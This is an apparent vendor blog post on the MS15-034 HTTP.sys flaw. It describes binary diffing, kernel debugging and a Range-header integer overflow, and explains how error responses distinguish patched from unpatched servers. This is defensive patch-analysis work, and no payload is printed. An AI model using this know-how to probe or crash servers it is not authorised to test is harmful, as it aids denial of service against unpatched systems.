Cybersecurity Insurance Checklist - Meet Insurance Requirements with BeyondTrust PAM Download for Free

  • Partners
  • Support
  • Careers
  • English
    • Deutsch
    • français
    • español
    • 한국어
    • português
BeyondTrust
  • Products

    Privileged Password Management

    Discover, manage, audit, and monitor privileged accounts and credentials.

    • Password Safe
    • DevOps Secrets Safe
    • Privileged Access Discovery Application

    Endpoint Privilege Management

    Enforce least privilege across Windows, Mac, Linux, and Unix endpoints.

    • Windows and Mac
    • Unix and Linux
    • Active Directory Bridge

    Secure Remote Access

    Centrally manage remote access for service desks, vendors, and operators.

    • Remote Support
    • Privileged Remote Access
    • Privileged Access Discovery Application

    Cloud Security Management

    Automate the management of identities and assets across your multicloud footprint.

    • Cloud Privilege Broker

    BeyondInsight

    Experience the industry’s most innovative, comprehensive platform for privileged access management.

  • Solutions

    Use Cases

    • Cloud Security
    • Compliance
    • Cyber Insurance
    • Digital Transformation
    • Endpoint Security
    • Operational Technology
    • Ransomware
    • Service Desk Efficiency
    • Zero Trust

    Industry Applications

    • Financial Services
    • Government Agencies
    • Healthcare
    • Law Enforcement
    • Manufacturing
    • Schools & Universities

    Solutions

    The BeyondTrust Privileged Access Management portfolio is an integrated solution that provides visibility and control over all privileged accounts and users.

  • Resources

    Learn

    • Blog
    • Customer Stories
    • Competitor Comparisons
    • Datasheets
    • Demos
    • Glossary
    • Podcast
    • Whitepapers

    Attend

    • Events
    • Go Beyond
    • Training
    • Webinars

    Support

    • Changelog
    • Professional Services
    • Technical Documentation

    Universal Privilege Management

    Our innovative Universal Privilege Management approach secures every user, asset, and session across your entire enterprise.

  • Company
    • About
    • Leadership
    • Core Values
    • Partners
    • Careers
  • Watch Demo
  • Contact Sales

The Delicate Art of Remote Checks – A Glance Into MS15-034

April 15, 2015

  • Blog
  • Archive

Recently, the research team posted a testing script for the MS15-034 vulnerability to pastebin for the greater community to test. We received some feedback about how exactly we figured out how to check, and remote checks in general.

By definition a remote check is a piece of code that allows the user to discern a vulnerability by actually exercising the code in a patch. These types of checks became popular during the era of worms, as a way to reliably determine exploitability in circumstances where a server’s banner was not enough information to discern a patched status. The exact process is somewhat difficult to capture as years of patch analysis at eEye (acquired by BeyondTrust in 2012) provides some measure of intuition.

One generally starts with a binary diff, and this circumstance is no different. Let’s examine the changes to HTTP.sys on Windows 7.

1

The notable takeaway from this is that every function name contains ‘range’. This is pretty exciting for us because it is reminiscent of a vulnerability in Apache HTTPd when handling the ‘Range’ header (see RFC2616 Section 14.35).

The conjecture that we are indeed dealing with the range header is easy enough to verify. If we take a look at the caller of HTTP!UlpParseRange in IDA we see the following:

2

Generally now, since our goal is to audit this vulnerability, we will set up a kernel debugger on an affected system. In our case it will be a Windows 7 SP1 VMWare target. We can prepare this target in the debugger for testing by setting breakpoints on all changed functions.

3

In this case, our breakpoints will trigger a callstack to be printed and will continue execution. Since we already had the Apache RangeDos trigger laying around, we simply ran that against the VM as it does test quite a few conditions as a bonus. We get the following:

4

So the standard Apache RangeDos script indeed hits one of the patched functions. Let’s take a closer look at HTTP!UlpParseRange:

14

The old code seems to be manipulating some kind of large integer.

5

And the new code looks like it’s using a call to HTTP!RtlULongLongAdd to check for integer overflow. Note, this is not the standard 3 parameter function, but a 5 parameter implementation in HTTP.sys. We can see if we get an error (like STATUS_INTEGER_OVERFLOW), we return 0xC000000D – STATUS_INVALID_PARAMETER.

After trimming a POC down to hit this function, it ends up being pretty simple.

6

Now, we can breakpoint the top of the changed block in the unpatched variant and get some feedback.

7

This looks great. EAX is 31337 (our upper range) and EDI is 1337 (our lower). In the old code, then it looks like if our lower range is 0, we end up subtracting nothing from the upper range. We then add one to it. Seems like if our upper range was massive, we could add one to it to flip it over to 0. This is more clear in the HexRays output

*(_QWORD *)v18 = __PAIR__(v22, v23) - __PAIR__(v21, v20) + 1;

Lets try.

8

We can see that our upper range is now huge. Let’s check out the addition.

9

We can see that EAX is predictably small now. Now that we have some indication of what the pre-patch block is doing, let’s look at the patch again.

10

Presumably here if we try the same shenanigans, we will cause an error to be returned. What is interesting is that this error is returned in many circumstances (as indicated by the degree of the node). It is our feeling that this may be key to checking for the patch. Let us revert our attention back to the pre-patched scenario.

One of many ways to get the unpatched function to return STATUS_INVALID_PARAMETER is to cause the highlighted check to fail below.

11

This is easy enough to do with a debugger. If we do this we get an interesting response:

12

Contrast this to the response from the same script if the STATUS_INVALID_PARAMETER return value is not forced:

13

This is the core change that allows us to check for patched vs unpatched.

tl;dr – the failure of the call to HTTP!RtlULongLongAdd in the patched function will cause STATUS_INVALID_PARAMETER to be returned from HTTP!UlpParseRange, which in turn will cause an “Invalid Header” response to be sent to the client. In the unpatched scenario, HTTP!UlpParseRange will return 0, causing a different error message to be sent back to the client “Requested Range Not Satisfiable”.

P.S. I will be speaking Monday, April 20th at BSidesSF2015 on "Probing Patches: Beyond Microsoft's ANS"

Photograph of Scott Lang

Scott Lang, Sr. Director, Product Marketing at BeyondTrust

Scott Lang has nearly 20 years of experience in technology product marketing, currently guiding the product marketing strategy for BeyondTrust’s privileged account management solutions and vulnerability management solutions. Prior to joining BeyondTrust, Scott was director of security solution marketing at Dell, formerly Quest Software, where he was responsible for global security campaigns, product marketing for identity and access management and Windows server management.

Stay Up To Date

Get the latest news, ideas, and tactics from BeyondTrust. You may unsubscribe at any time.

I agree to receive product related communications from BeyondTrust as detailed in the Privacy Policy, and I may manage my preferences or withdraw my consent at any time.

You May Also Be Interested In:

Whitepapers

Cybersecurity Insurance Checklist

Whitepapers

Microsoft Vulnerabilities Report 2021

Whitepapers

Privileged Access Management: PAM Checklist

Keep up with BeyondTrust

I agree to receive product related communications from BeyondTrust as detailed in the Privacy Policy, and I may manage my preferences or withdraw my consent at any time.

Customer Support
Contact Sales

Products

  • Endpoint Privilege Management
  • Password Management
  • Privileged Remote Access
  • DevOps Secrets Safe
  • Remote Support
  • Cloud Privilege Broker

Resources

  • Blog
  • Case Studies
  • Competitor Comparisons
  • Datasheets
  • Glossary
  • Podcast
  • Videos
  • Webcasts
  • Whitepapers

About

  • Company
  • Careers
  • Contact
  • Events
  • Leadership Team
  • Partner Program
  • Press
BeyondTrust Logo
  • Facebook
  • Twitter
  • LinkedIn
  • Privacy
  • Security
  • Manage Cookies
  • WEEE Compliance

Copyright © 1999 — 2022 BeyondTrust Corporation. All rights reserved. Other trademarks identified on this page are owned by their respective owners. BeyondTrust Corporation is not a chartered bank or trust company, or depository institution. It is not authorized to accept deposits or trust accounts and is not licensed or regulated by any state or federal banking authority.